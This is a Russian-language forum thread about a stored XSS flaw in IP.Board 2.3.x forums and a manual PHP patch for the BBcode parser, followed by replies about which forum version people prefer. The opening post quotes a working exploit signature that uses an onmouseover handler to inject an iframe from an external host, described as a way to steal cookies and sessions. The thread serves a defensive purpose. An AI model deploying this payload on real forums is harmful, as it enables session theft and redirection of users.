1. Важное и срочное обновление IPB 3.4.5 - https://nulled.cc/threads/243375/

[Помощь] [patch] Активная XSS в IP.Board 2.3.х - исправление

Тема в разделе "IPB", создана пользователем E-body, 9 мар 2010.

Статус темы:
Закрыта.
Модераторы: Maybe
  1. E-body

    E-body

    Регистр.:
    6 сен 2007
    Сообщения:
    985
    Симпатии:
    331
    Недавно было опубликовано о возможности произведения активной XSS на форумах IPB 2.3.x > , изза неправильной работы парсера BB кодов.
    Пример злоумышленного кода в подписи юзера:
    PHP:
    [color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]
    Возможность увести куки, сессии, перенаправить пользователя на другую страницу - выполнение явяскрипт на странице.

    Исправление!
    Если у вас на форуме не изменен файл ../sources/classes/bbcode/class_bbcode_core.php то просто замените пофиксенным с офф сайта community.invisionpower.com/topic/306221-ipboard-236-and-305-security-update/page__pid__1922743__st__0&#entry1922743

    Исправления в ручную (в том случае когда файл был ранее изменен например изза модов типо HIDE или другое)

    Открыть ../sources/classes/bbcode/class_bbcode_core.php
    Найти (примерно 777 строка) :
    PHP:
    # XSS Check: Bug ID: 980
                                
    if ( $row['bbcode_tag'] == 'post' OR $row['bbcode_tag'] == 'topic' OR $row['bbcode_tag'] == 'snapback' )
                                {
                                    
    $match$_option ][$i] = intval$match$_option ][$i] );
                                }
    Добавить после код:
    PHP:
                                # XSS acronym
                                
    if ( $row['bbcode_tag'] == 'acronym' )
                                {
                                    
    $match$_option ][$i]  = preg_replace"/s((\\\|\)*)t((\\\|\)*)y((\\\|\)*)l((\\\|\)*)e((\\\|\)*)=/is""st yle="$match$_option ][$i] );
                                    
    $match$_option ][$i]  = str_replace( array( ':'';' ), ''$match$_option ][$i] );
                                    
    $match$_content ][$i] = preg_replace"/s((\\\|\)*)t((\\\|\)*)y((\\\|\)*)l((\\\|\)*)e((\\\|\)*)=/is""st yle="$match$_content ][$i] );
                                    
    $match$_content ][$i] = str_replace( array( ':'';' ), ''$match$_content ][$i] );
                                }
    Вот и весь фикс. ;)
    п.с. в ипб 3 версии скорее также исправление, поскольку не пользуюсь то решил не смешивать все в одной теме. Отдельное спасибо cyber-city форуму за обсуждение баги ;)
     
    idGreen, PaCTa и Benediktoz нравится это.
  2. Sheffik

    Sheffik Постоялец

    Регистр.:
    21 янв 2009
    Сообщения:
    105
    Симпатии:
    38
    2.3.x версии еще кто-то использует?
     
  3. Sma11erM1nd

    Sma11erM1nd Постоялец

    Регистр.:
    14 апр 2006
    Сообщения:
    96
    Симпатии:
    18
    А мне например вторая линейка нравиться намного больше третьей. Тройка получилась слишком уж социальная и к тому же громоздкая имхо.

    А вот уязвимость я как-то упустил. Пойду патчить форум.
     
  4. Sheffik

    Sheffik Постоялец

    Регистр.:
    21 янв 2009
    Сообщения:
    105
    Симпатии:
    38
    Социальность нынче в моде =)
     
  5. Benediktoz

    Benediktoz

    Регистр.:
    20 июн 2009
    Сообщения:
    250
    Симпатии:
    35
    Я тоже использую 2.3.6

    Мне во всех отношениях больше нравится :) Соглашусь с мнением Sma11erM1nd
     
  6. kss27

    kss27 Писатель

    Регистр.:
    15 фев 2010
    Сообщения:
    5
    Симпатии:
    1
    Спасибо за русификатор
     
  7. idGreen

    idGreen Писатель

    Регистр.:
    12 фев 2009
    Сообщения:
    9
    Симпатии:
    0
    Спасибку тыкнул за инфу, Кстате я так же на 2.3.6 сижу да бы она полегче да и глюков нет, а вот линейка 3.0.Х еще рановато да и она тяжелая.
     
Статус темы:
Закрыта.